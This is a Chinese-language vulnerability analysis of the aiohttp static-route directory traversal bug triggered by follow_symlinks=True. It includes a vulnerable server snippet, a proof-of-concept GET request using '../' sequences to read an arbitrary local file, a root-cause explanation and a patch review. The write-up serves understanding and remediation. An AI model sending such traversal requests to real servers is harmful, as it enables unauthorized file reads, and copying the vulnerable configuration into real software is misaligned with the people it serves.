漏洞描述:
aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时,需要指定静态文件的根路径。此外,选项“follow_symlinks”
可用于确定是否遵循静态根目录之外的符号链接。当“follow_symlinks”
设置为 True
时,不会进行验证来检查读取的文件是否位于根目录内。这可能会导致目录遍历漏洞,从而导致对系统上的任意文件进行未经授权的访问,即使符号链接不存在也是如此。鼓励缓解措施是禁用 follow_symlinks
并使用反向代理。版本 3.9.2 修复了此问题。
服务启动Py文件中有"/static", “static/
” 其中一个是涉及现有目录,没有自行创建一个,不然可能会报错
from aiohttp import webasync def index(request):return web.Response(text="Hello, World!")app = web.Application()
app.router.add_routes([web.static("/static", "static/", follow_symlinks=True),
])
app.router.add_get('/', index)if __name__ == '__main__':web.run_app(app, host='127.0.0.1', port=9999)
GET /static/../../../../D:\\6666.txt HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
漏洞原因
在使用 aiohttp 作为 Web 服务器时,错误配置静态资源解析可能导致目录遍历漏洞,允许攻击者未经授权读取系统上的任意文件。该漏洞的根本问题在于静态路由配置中的 follow_symlinks
选项,当设置为 True
时,可能绕过验证,使得符号链接可以指向根目录之外的文件,导致安全漏洞。
app.router.add_routes([web.static("/static", "static/", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability
])
补丁分析
通过官方项目发布补丁情况
- 路径处理逻辑: 使用
normalized_path
对未解析的路径进行规范化处理,消除冗余的分隔符和相对路径。然后再尝试将规范化的路径转换为相对于指定目录的相对路径,最后解析为绝对路径。 - 符号链接处理: 根据
follow_symlinks
的设置,决定是否遵循符号链接。如果需要遵循,则使用规范化的路径,否则直接使用未解析的路径。 - 异常处理: 在捕获到可能的异常时,如
ValueError
或FileNotFoundError
,同样触发了适当的错误处理,即抛出 HTTPForbidden 异常。
结束语
从启用 follow_symlinks 选项并且路径指向符号链接时发生目录遍历漏洞。通过补丁改进,补丁代码确保了在处理静态资源时,即使路径指向符号链接,也能正确地验证路径是否在指定的根目录内,从而防止了目录遍历漏洞。